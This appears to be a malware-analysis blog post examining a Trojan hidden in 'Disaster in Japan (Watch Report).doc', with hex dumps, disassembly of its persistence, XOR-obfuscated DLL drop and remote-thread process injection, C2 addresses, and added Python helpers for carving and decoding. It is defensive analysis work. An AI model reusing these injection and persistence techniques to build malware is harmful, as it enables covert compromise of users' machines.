Disaster in Japan (Watch Report).doc – Payload Analysis

4 comments   |   Malware

  • Today I will analyze the payload found within the following document:
File Name:  Disaster in Japan (Watch Report).doc
File Size:  62464 bytes
MD5:        7b3208b1dc28b2d5f7641aa212e6aabf
SHA1:       8a60a2183a044bbeae90f0354acdbf6f6f052925
  • If you dump this document in your favorite hex viewer you will soon see hex-encoded shellcode stored as ASCII, but I will not focus on that here.  The following analysis will focus on the payload.
  • At file offset 0x800 you will notice something that looks like the beginning of an executable file minus the MZ and PE signature bytes (the rest of the DOS and PE headers is intact):
0800h: 00 00 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  ...........ÿÿ..
0810h: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ¸.......@.......
0820h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0830h: 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00  ............à...
0840h: 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..´.Í!¸.LÍ!Th
0850h: 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
0860h: 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
0870h: 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
0880h: 0F 00 83 8C 4B 61 ED DF 4B 61 ED DF 4B 61 ED DF  ..ƒŒKaíßKaíßKaíß
0890h: 29 7E FE DF 4D 61 ED DF 7D 47 E9 DF 49 61 ED DF  )~þßMaíß}GéßIaíß
08A0h: C8 7D E3 DF 49 61 ED DF 24 7E E7 DF 40 61 ED DF  È}ãßIaíß$~çß@aíß
08B0h: 24 7E E9 DF 48 61 ED DF 4B 61 EC DF 32 61 ED DF  $~éßHaíßKaìß2aíß
08C0h: 7D 47 E6 DF 4E 61 ED DF 8C 67 EB DF 4A 61 ED DF  }GæßNaíߌgëßJaíß
08D0h: 52 69 63 68 4B 61 ED DF 00 00 00 00 00 00 00 00  RichKaíß........
08E0h: 00 00 00 00 4C 01 04 00 51 B7 7D 4D 00 00 00 00  ....L...Q•}M....
08F0h: 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 28 00 00  ....à........(..
0900h: 00 62 00 00 00 00 00 00 AC 32 00 00 00 10 00 00  .b......¬2......
0910h: 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00  .@....@.........
0920h: 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  ................
0930h: 00 B0 00 00 00 04 00 00 00 00 00 00 02 00 00 00  .°..............
0940h: 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  ................
0950h: 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  ................
0960h: 08 44 00 00 78 00 00 00 00 60 00 00 60 4E 00 00  .D..x....`..`N..
0970h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0980h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0990h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
09A0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
09B0h: 00 00 00 00 00 00 00 00 00 40 00 00 F8 01 00 00  .........@..ø...
09C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
09D0h: 00 00 00 00 00 00 00 00 2E 74 65 78 74 00 00 00  .........text...
09E0h: 6A 26 00 00 00 10 00 00 00 28 00 00 00 04 00 00  j&.......(......
09F0h: 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60  ............ ..`
0A00h: 2E 72 64 61 74 61 00 00 CE 0A 00 00 00 40 00 00  .rdata..Î....@..
  • Once you write the MZ signature at file offset 0x800 and the PE signature at 0x8E0 (0x800 plus the e_lfanew value 0xE0 stored at 0x83C) and carve the data from 0x800 onward, you have a valid executable file, which I have named japan.exe.
  • This file has the following characteristics:
File Name:  japan.exe
File Size:  37888 bytes
MD5:        5abd60f270b7169685dbc9e9e66a3734
SHA1:       2586d808938adf8d819a238080b20c34dc0ff294
PE Time:    0x4D7DB751 [Mon Mar 14 06:36:01 2011 UTC]
AV:         9/43 hits [VirusTotal]
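As an added example (not code from the original post), here is a small Python carver that performs the repair described above: it copies everything from 0x800 onward, rewrites the MZ and PE\0\0 signatures using the e_lfanew value still present in the DOS header, and parses the COFF header so the carve can be sanity-checked against the PE time and section count listed above. The input is a constructed stand-in built from the field values visible in the dump; the real document is not embedded.

```python
import struct
from datetime import datetime, timezone

DOC_OFFSET = 0x800  # file offset where the headless PE image begins (from the dump)


def repair_embedded_pe(doc: bytes, offset: int = DOC_OFFSET) -> tuple[bytes, dict]:
    """Carve the PE image at `offset`, restore the zeroed 'MZ' and 'PE\\0\\0'
    signatures, and parse the COFF header so the carve can be sanity-checked."""
    image = bytearray(doc[offset:])
    if len(image) < 0x40:
        raise ValueError("too short for a DOS header")
    # e_lfanew (offset 0x3C of the DOS header) survives in the dump: E0 00 00 00
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if not 0x40 <= e_lfanew <= len(image) - 24:
        raise ValueError(f"implausible e_lfanew 0x{e_lfanew:x}")
    image[0:2] = b"MZ"
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    machine, nsections, timestamp = struct.unpack_from("<HHI", image, e_lfanew + 4)
    info = {
        "pe_file_offset": offset + e_lfanew,   # 0x800 + 0xE0 = 0x8E0 for this sample
        "machine": machine,                    # 0x014C = IMAGE_FILE_MACHINE_I386
        "sections": nsections,
        "timestamp": timestamp,
        "compiled": datetime.fromtimestamp(timestamp, timezone.utc),
    }
    return bytes(image), info


def build_sample() -> bytes:
    """Constructed stand-in for the document (the real file is not embedded):
    0x800 bytes of filler, a DOS header with 'MZ' zeroed and e_lfanew = 0xE0,
    then a COFF header with 'PE\\0\\0' zeroed. Field values are those visible
    in the hex dump on the page."""
    dos = bytearray(0x40)
    struct.pack_into("<I", dos, 0x3C, 0xE0)
    stub = b"\0" * (0xE0 - 0x40)
    coff = b"\0\0\0\0" + struct.pack("<HHI", 0x014C, 4, 0x4D7DB751) + b"\0" * 12
    return b"\0" * 0x800 + bytes(dos) + stub + coff + b"\0" * 0x20


if __name__ == "__main__":
    carved, meta = repair_embedded_pe(build_sample())
    print(f"PE header at 0x{meta['pe_file_offset']:X}, "
          f"{meta['sections']} sections, built {meta['compiled']:%Y-%m-%d %H:%M:%S} UTC")
```

On the real document the same call would be `repair_embedded_pe(open("Disaster in Japan (Watch Report).doc", "rb").read())`, and the returned image is what the post names japan.exe.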
  • When file japan.exe is executed, it creates a copy of itself with the same name in the \Windows\system32\ folder.
  • It backdates its timestamps to match those of cmd.exe.
  • It sets the following value in the registry:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
      • Athene = [File path]\japan.exe
  • It then executes \Windows\system32\japan.exe and exits.
  • The newly created process (\windows\system32\japan.exe) reads the registry value Athene, retrieves the path from which the file was originally executed, and deletes that file.
  • The registry value Athene is also deleted.  So, the whole purpose of this registry entry was to temporarily store the path of the original file (i.e. the one that is dropped when the malicious document is opened) so that the second instance of the Trojan (i.e. the one running from the \windows\system32\ folder) can delete the original file.
  • The Trojan then sleeps for 5 minutes.
  • When it wakes up it calls GetLocalTime and checks whether the seconds value is less than or equal to 49 (0x31).
    • If the condition is true, 10 is added to the obtained value (6 in my case), and GetLocalTime is then called in a loop until the seconds value matches (i.e. 16).  This is weird, but it is probably here to add a bit of randomness to the intervals of communication.
    • If the condition is not true, 50 (0x32) is subtracted from the number of seconds and the same loop as above is taken.
    • Here is the code for this:
0040137B  |.  68 20BF0200   PUSH 2BF20                               ; /Timeout = 180000. ms
00401380  |.  FF15 8C404000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>]    ; \Sleep
00401386  |.  8D45 B4       LEA EAX, DWORD PTR SS:[EBP-4C]
00401389  |.  50            PUSH EAX                                 ; /pLocaltime
0040138A  |.  8B3D 90404000 MOV EDI, DWORD PTR DS:[<&KERNEL32.GetLoc>; |kernel32.GetLocalTime
00401390  |.  FFD7          CALL EDI                                 ; \GetLocalTime
00401392  |.  0FB745 C0     MOVZX EAX, WORD PTR SS:[EBP-40]
00401396  |.  8945 C4       MOV DWORD PTR SS:[EBP-3C], EAX
00401399  |.  83F8 31       CMP EAX, 31
0040139C  |.  7E 06         JLE SHORT japan.004013A4
0040139E  |.  836D C4 32    SUB DWORD PTR SS:[EBP-3C], 32
004013A2  |.  EB 04         JMP SHORT japan.004013A8
004013A4  |>  8345 C4 0A    ADD DWORD PTR SS:[EBP-3C], 0A
004013A8  |>  8D45 B4       /LEA EAX, DWORD PTR SS:[EBP-4C]
004013AB  |.  50            |PUSH EAX
004013AC  |.  FFD7          |CALL EDI                                ;  kernel32.GetLocalTime
004013AE  |.  0FB745 C0     |MOVZX EAX, WORD PTR SS:[EBP-40]
004013B2  |.  3B45 C4       |CMP EAX, DWORD PTR SS:[EBP-3C]
  • This Trojan contains a resource named TXT, which is an obfuscated DLL.
  • This resource is obfuscated by XOR-ing each byte with 0xC5, skipping NULL bytes and bytes that match the key (i.e. 0xC5).
  • Here is the code for this algorithm:
00401BA5  |> /8A0429        /MOV AL, BYTE PTR DS:[ECX+EBP]
00401BA8  |. |84C0          |TEST AL, AL
00401BAA  |. |74 09         |JE SHORT japan.00401BB5
00401BAC  |. |3C C5         |CMP AL, 0C5
00401BAE  |. |74 05         |JE SHORT japan.00401BB5
00401BB0  |. |34 C5         |XOR AL, 0C5
00401BB2  |. |880429        |MOV BYTE PTR DS:[ECX+EBP], AL
00401BB5  |> |41            |INC ECX
00401BB6  |. |3BCF          |CMP ECX, EDI
00401BB8  |.^\72 EB         \JB SHORT japan.00401BA5
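Added example, not the post's own code: the loop above re-implemented in Python, together with a post-decode header check and a key-recovery shortcut for the case where the constant is not yet known (the last two are my additions for the analyst, not something the Trojan does). The input is a constructed PE-shaped blob, not the real TXT resource.

```python
from typing import Optional

KEY = 0xC5  # the XOR constant seen at 00401BAC/00401BB0


def xor_skip(data: bytes, key: int = KEY) -> bytes:
    """Re-implementation of the loop at 00401BA5: XOR every byte with `key`,
    leaving 0x00 bytes and bytes equal to `key` untouched. Because those two
    skipped values are each other's XOR image, the mapping is a bijection and
    its own inverse, so one routine both obfuscates and de-obfuscates."""
    out = bytearray(data)
    for i, b in enumerate(out):
        if b != 0 and b != key:
            out[i] = b ^ key
    return bytes(out)


def looks_like_pe(blob: bytes) -> bool:
    """Plausibility check after decoding: 'MZ' at 0 and 'PE\\0\\0' at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_key(blob: bytes) -> Optional[int]:
    """Analyst's shortcut when the constant is unknown: if the resource is a
    PE, its first two bytes must decode to 'MZ', so the candidate key is
    blob[0] ^ 'M', confirmed against blob[1] ^ 'Z'. Returns 0 for an
    unobfuscated PE. (Assumes neither plaintext byte fell under the skip rule,
    which holds for any key other than 'M' or 'Z' themselves.)"""
    if len(blob) < 2:
        return None
    k = blob[0] ^ ord("M")
    return k if blob[1] ^ k == ord("Z") else None


def build_fake_dll() -> bytes:
    """Constructed stand-in for the TXT resource (the real DLL is not embedded):
    a 0x60-byte PE-shaped blob with e_lfanew = 0x40, zero runs and a literal
    0xC5 byte so both skip rules are exercised."""
    hdr = bytearray(0x60)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    hdr[0x40:0x44] = b"PE\0\0"
    hdr[0x50] = 0xC5
    return bytes(hdr)
```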
  • So, at this point the Trojan finds this resource, de-obfuscates it, and saves it under a file named: \WINDOWS\system32\csrls.dll.
  • This DLL file has the following characteristics:
File Name:  csrls.dll
File Size:  19968 bytes
MD5:        4024b94f09aff8f0e08c758c415a8c21
SHA1:       1e8cec0d20db5c134d5a9c7908bab6313ea82e8a
PE Time:    0x4D79DBE3 [Fri Mar 11 08:22:59 2011 UTC]
AV:         5/43 hits [VirusTotal]
  • The timestamps of this DLL are backdated to match those of calc.exe.  Its HIDDEN and SYSTEM attributes are turned on.
  • This DLL exports a single function, ThreadEntry.  Furthermore, its original file name may have been senddll.dll.
  • The Trojan then creates the following registry entry:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
      • Athene: C:\WINDOWS\system32\japan.exe
  • It creates a process from one of the following executable files: services.exe, iexplorer.exe, or lsass.exe.
  • It opens that process, writes into its memory, and creates a remote thread in it that runs the ThreadEntry code of csrls.dll:
00401649  |.  50            PUSH EAX                                     ; /ProcessId
0040164A  |.  53            PUSH EBX                                     ; |Inheritable
0040164B  |.  6A 2A         PUSH 2A                                      ; |Access = CREATE_THREAD|VM_OPERATION|VM_WRITE
0040164D  |.  FF15 94404000 CALL DWORD PTR DS:[<&KERNEL32.OpenProcess>]  ; \OpenProcess

004017C3  |.  53            PUSH EBX                                     ; /pBytesWritten => NULL
004017C4  |.  8B45 B0       MOV EAX, DWORD PTR SS:[EBP-50]               ; |
004017C7  |.  8B80 C4000000 MOV EAX, DWORD PTR DS:[EAX+C4]               ; |
004017CD  |.  FF70 50       PUSH DWORD PTR DS:[EAX+50]                   ; |BytesToWrite
004017D0  |.  FF75 C8       PUSH DWORD PTR SS:[EBP-38]                   ; |Buffer
004017D3  |.  FF75 E4       PUSH DWORD PTR SS:[EBP-1C]                   ; |Address
004017D6  |.  FF75 D0       PUSH DWORD PTR SS:[EBP-30]                   ; |hProcess
004017D9  |.  FF15 9C404000 CALL DWORD PTR DS:[<&KERNEL32.WriteProcessMe>; \WriteProcessMemory
004017DF  |.  85C0          TEST EAX, EAX
004017E1  |.  74 21         JE SHORT japan.00401804
004017E3  |.  53            PUSH EBX
004017E4  |.  53            PUSH EBX
004017E5  |.  FF75 D8       PUSH DWORD PTR SS:[EBP-28]
004017E8  |.  FF75 D4       PUSH DWORD PTR SS:[EBP-2C]
004017EB  |.  53            PUSH EBX
004017EC  |.  53            PUSH EBX
004017ED  |.  FF75 D0       PUSH DWORD PTR SS:[EBP-30]
004017F0  |.  FF15 A0404000 CALL DWORD PTR DS:[<&KERNEL32.CreateRemoteTh>;  kernel32.CreateRemoteThread

ANALYSIS OF CSRLS.DLL

File Name:  csrls.dll
File Size:  19968 bytes
MD5:        4024b94f09aff8f0e08c758c415a8c21
SHA1:       1e8cec0d20db5c134d5a9c7908bab6313ea82e8a
PE Time:    0x4D79DBE3 [Fri Mar 11 08:22:59 2011 UTC]
AV:         5/43 hits [VirusTotal]
  • The strings of this DLL are very descriptive of some of its functionality:
    • Traverse the filesystem.
    • Upload/Download files.
    • Start/kill processes.
  • Based on this string: “Mesaj de la client. Totul e Ok” (Romanian for “Message from the client. Everything is OK”), this Trojan may have its origin in Romania.
  • It beacons to 65.5.227.69 and 24.173.215.70, both over TCP port 6386.
  • At the time of this writing, neither IP accepted connections on port 6386.
  • When a connection is established, it sends this data to the C2 node:
00000000  47 61 62 62 79 00                                Gabby.
  • Later the Trojan sent the machine name, IP address and country information to the C2 node in the clear (so it appears no traffic encryption occurs):
victim 192.168.1.100US
  • I may continue to analyze this Trojan further another day.
  • Here is a string dump from memory:
Text strings referenced in 00090000..00098FFF
Address    Disassembly      Text string
000915A3   PUSH 9619C       ASCII "Gabby"
0009188E   PUSH 9618C       ASCII "delete file"
000918AB   PUSH 96188       ASCII "OK"
0009194D   PUSH 9617C       ASCII "nosuccess"
0009195B   PUSH 9616C       ASCII "execute file"
00091A70   PUSH 96188       ASCII "OK"
00091B04   PUSH 96164       ASCII "open"
00091B1C   PUSH 9615C       ASCII "success"
00091B43   PUSH 9614C       ASCII "get file status"
00091C58   PUSH 96188       ASCII "OK"
00091D24   PUSH 96144       ASCII "file ok"
00091D90   PUSH 96138       ASCII "unavalaible"
00091FE8   PUSH 9610C       ASCII "check for file"
000920FD   PUSH 96188       ASCII "OK"
000921BA   PUSH 96144       ASCII "file ok"
00092304   PUSH 96104       ASCII "break"
00092318   PUSH 960F8       ASCII "download ok"
00092357   PUSH 960EC       ASCII "file ready"
0009238A   PUSH 96138       ASCII "unavalaible"
000923B1   PUSH 960E0       ASCII "upload file"
000924C6   PUSH 96188       ASCII "OK"
00092520   PUSH 96144       ASCII "file ok"
00092537   PUSH 960D8       ASCII "send"
0009258C   PUSH 960D0       ASCII "nopath"
000925B9   PUSH 960D8       ASCII "send"
00092661   PUSH 960D8       ASCII "send"
000926D5   PUSH 960D8       ASCII "send"
00092736   PUSH 960EC       ASCII "file ready"
0009277E   PUSH 960D8       ASCII "send"
000927A5   PUSH 960C0       ASCII "upload ok"
000927FF   PUSH 960B4       ASCII "files send"
00092927   PUSH 96188       ASCII "OK"
00092AEF   PUSH 960A8       ASCII "done"
00092B05   PUSH 9609C       ASCII "file exit"
00092B4C   PUSH 9619C       ASCII "Gabby"
00092BDA   PUSH 96070       ASCII "US"
00092C13   MOV ESI, DWORD   (Initial CPU selection)
00092D8C   PUSH 96288       ASCII "Client Ready"
00092D9C   MOV EBP, 9619C   ASCII "Gabby"
00092DA3   PUSH 96268       ASCII "Mesaj de la client. Totul e Ok"
00092DCB   PUSH 96260       ASCII "ping"
00092DDE   PUSH 96258       ASCII "pong"
00092E0F   PUSH 96250       ASCII "files"
00092E44   PUSH 96244       ASCII "getstatus"
00092E6F   PUSH 96188       ASCII "OK"
00092F90   PUSH 9622C       ASCII "Drives on computer: "
00093113   PUSH 9621C       ASCII "killserver"
00093137   PUSH 96188       ASCII "OK"
0009314B   PUSH 9620C       ASCII "ERROR_SUCCESS"
0009327F   PUSH 961FC       ASCII "restartserver"
000932A8   PUSH 96188       ASCII "OK"
000932BD   PUSH 9620C       ASCII "ERROR_SUCCESS"
000933D3   PUSH 961F0       ASCII "kill proc"
00093401   PUSH 96188       ASCII "OK"
00093451   PUSH 961D4       ASCII "Process Killed Succesfully"
0009345A   PUSH 961B4       ASCII "Process Not Killed Succesfully"
00093569   PUSH 961A4       ASCII "send processes"
0009359A   PUSH 96188       ASCII "OK"
000937F9   PUSH 960A8       ASCII "done"
00093B7B   PUSH 962A8       ASCII "HARDWARE\DESCRIPTION\System\CentralProcessor"
00093BC0   PUSH 962A4       ASCII "N/A"
00093BD9   PUSH 9629C       ASCII "~MHz"
00093BED   PUSH 96298       ASCII "%i"
00093D3D   PUSH 96010       ASCII "24.173.215.70"
00093D73   PUSH 96010       ASCII "24.173.215.70"
00093D7F   PUSH 96030       ASCII "65.5.227.69"
00093FC6   PUSH 96090       ASCII "6386"
    • shpata (03-21-11):

      Thank you diocyde.

      You can get source code for both the client and the server there.
